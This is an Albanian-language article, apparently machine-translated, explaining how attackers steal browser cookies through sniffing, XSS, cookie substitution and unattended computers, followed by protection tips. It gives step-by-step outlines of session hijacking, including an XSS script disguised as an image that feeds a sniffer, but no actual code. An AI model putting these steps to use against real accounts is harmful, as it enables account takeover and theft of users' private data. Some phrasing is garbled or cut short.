Për të futur një sniffer në kanalin e Internetit midis nyjes së përdoruesit dhe serverit në internet, përdoren metodat e mëposhtme:

  • "dëgjimi" i ndërfaqeve të rrjetit (hubs, switch);
  • degëzimi dhe kopjimi i trafikut;
  • lidhja me një boshllëk kanali të rrjetit;
  • analiza përmes sulmeve speciale që ridrejtojnë trafikun e viktimës tek sniffer (MAC-spoofing, IP-spoofing).

Shkurtesa XSS qëndron për skriptimin e faqeve të kryqëzuara. Përdoret për të sulmuar faqet e internetit në mënyrë që të vjedhin të dhënat e përdoruesit.

Parimi i XSS është si më poshtë:

  • një sulmues fut kodin keqdashës (një skrip i veçantë i maskuar) në një faqe interneti të një faqe interneti, forumi ose në një mesazh (për shembull, kur korrespondon në një rrjet social);
  • viktima shkon në faqen e infektuar dhe aktivizon kodin e instaluar në kompjuterin e tij (klikon, ndjek një lidhje, etj.);
  • nga ana tjetër, kodi keqdashës i ekzekutuar "nxjerrë" të dhënat konfidenciale të përdoruesit nga shfletuesi (në veçanti, cookies) dhe i dërgon ato në serverin e internetit të sulmuesit.

Për të "implantuar" një mekanizëm softuerësh XSS, hakerët përdorin të gjitha llojet e dobësive në serverët e internetit, shërbimet në internet dhe shfletuesit.

Të gjitha dobësitë XSS ndahen në dy lloje:

  • Pasive. Sulmi merret duke kërkuar një skript specifik në një faqe interneti. Kodi keqdashës mund të injektohet në forma të ndryshme në një faqe interneti (për shembull, në shiritin e kërkimit të një sajti). Më të ndjeshëm ndaj XSS pasive janë burimet që nuk filtrojnë etiketat HTML kur arrijnë të dhënat;
  • Aktiv. E vendosur direkt në server. Dhe ato aktivizohen në shfletuesin e viktimës. Ato përdoren në mënyrë aktive nga mashtruesit në të gjitha llojet e blogjeve, bisedave dhe burimeve të lajmeve.

Hakerët "kamuflojnë" me kujdes skriptet e tyre XSS në mënyrë që viktima të mos dyshojë për asgjë. Ata ndryshojnë shtrirjen e skedarit, kalojnë kodin si imazh, i motivojnë të ndjekin lidhjen dhe i tërheqin me përmbajtje interesante. Si rezultat: një përdorues PC, i paaftë për të kontrolluar kureshtjen e tij, me dorën e tij (me një klikim të mausit) i dërgon skedarët e sesionit (me hyrje dhe fjalëkalim!) te autori i skriptit XSS - zuzari i kompjuterit.

Zëvendësimi i biskotave

Të gjitha cookie-t ruhen dhe dërgohen në serverin e uebit (nga i cili "erdhën") pa asnjë ndryshim - në formën e tyre origjinale - me të njëjtat vlera, vargje dhe të dhëna të tjera. Modifikimi i qëllimshëm i parametrave të tyre quhet zëvendësim i cookie-ve. Me fjalë të tjera, kur zëvendëson cookie-t, sulmuesi pretendon se është mendim i dëshiruar. Për shembull, kur bëni një pagesë në një dyqan online, cookie ndryshon shumën e pagesës në rënie - kështu, ndodh "kursimi" në blerjet.

Kukit e sesionit të vjedhur në një rrjet social nga llogaria e dikujt tjetër "futen" në një seancë tjetër dhe në një kompjuter tjetër. Pronari i kukive të vjedhura ka akses të plotë në llogarinë e viktimës (korrespondencë, përmbajtje, cilësimet e faqes) për sa kohë që ajo është në faqen e saj.

"Redaktimi" i cookie-ve kryhet duke përdorur:

  • Funksionet "Menaxho cookies..." në shfletuesin Opera;
  • Shtesat e Menaxherit të Cookies dhe të Advanced Cookie Manager për FireFox;
  • Shërbimet IECookiesView (vetëm Internet Explorer);
  • një redaktues teksti si AkelPad, NotePad ose Windows Notepad.
Qasje fizike në të dhëna

Një skemë shumë e thjeshtë zbatimi, e përbërë nga disa hapa. Por është efektiv vetëm nëse kompjuteri i viktimës me një seancë të hapur, për shembull VKontakte, lihet pa mbikëqyrje (dhe për një kohë të gjatë!):

  • Një funksion javascript futet në shiritin e adresave të shfletuesit për të shfaqur të gjitha cookie-t e ruajtura.
  • Pasi të keni shtypur “ENTER” të gjitha shfaqen në faqe.
  • Cookies kopjohen, ruhen në një skedar dhe më pas transferohen në një flash drive.
  • Në një kompjuter tjetër, cookies zëvendësohen në një sesion të ri.
  • Lejohet qasja në llogarinë e viktimës.
  • Si rregull, hakerët përdorin mjetet e mësipërme (+ të tjera) si në kombinim (pasi niveli i mbrojtjes në shumë burime në internet është mjaft i lartë) dhe veçmas (kur përdoruesit janë tepër naivë).

    XSS + nuhatës
  • Krijohet një skript XSS, i cili specifikon adresën e një sniferi në internet (qoftë i bërë në shtëpi ose një shërbim specifik).
  • Kodi me qëllim të keq ruhet me shtesën .img (format imazhi).
  • Ky skedar më pas ngarkohet në një faqe interneti, bisedë ose mesazh personal - ku do të kryhet sulmi.
  • Vëmendja e përdoruesit tërhiqet nga "kurthi" i krijuar (këtu hyn në fuqi inxhinieria sociale).
  • Nëse kurthi aktivizohet, skedarët e skedarëve nga shfletuesi i viktimës përgjohen nga sniffer.
  • Sulmuesi hap regjistrat e nuhatësit dhe merr biskotat e vjedhura.
  • Më pas, ai kryen një zëvendësim për të marrë të drejtat e pronarit të llogarisë duke përdorur mjetet e mësipërme.
  • Mbrojtja e cookies nga hakerimi
  • Përdorni një lidhje të koduar (duke përdorur protokollet dhe metodat e duhura të sigurisë).
  • Mos iu përgjigjni lidhjeve, fotove ose ofertave joshëse të dyshimta për t'u njohur me "softuerin e ri të lirë". Sidomos nga të huajt.
  • Përdorni vetëm burime të besuara të internetit.
  • Përfundoni seancën e autorizuar duke klikuar butonin "Dalje" (jo thjesht duke mbyllur skedën!). Sidomos nëse keni hyrë në llogarinë tuaj jo nga një kompjuter personal, por, për shembull, nga një PC në një kafene interneti.
  • Mos përdorni veçorinë "Ruaj fjalëkalimin" të shfletuesit. Të dhënat e ruajtura të regjistrimit rrisin ndjeshëm rrezikun e vjedhjes. Mos u bëni dembel, mos humbisni disa minuta kohë duke futur fjalëkalimin tuaj dhe të identifikoheni në fillim të çdo sesioni.
  • Pas shfletimit në ueb - duke vizituar rrjetet sociale, forume, biseda, faqe interneti - fshini skedarët e ruajtur të cookies dhe pastroni cache-in e shfletuesit.
  • Përditësoni rregullisht shfletuesit dhe programet antivirus.
  • Përdorni shtesat e shfletuesit që mbrojnë kundër sulmeve XSS (për shembull, NoScript për FF dhe Google Chrome).
  • Periodikisht në llogari.
  • Dhe më e rëndësishmja, mos e humbni vigjilencën dhe vëmendjen ndërsa pushoni ose punoni në internet!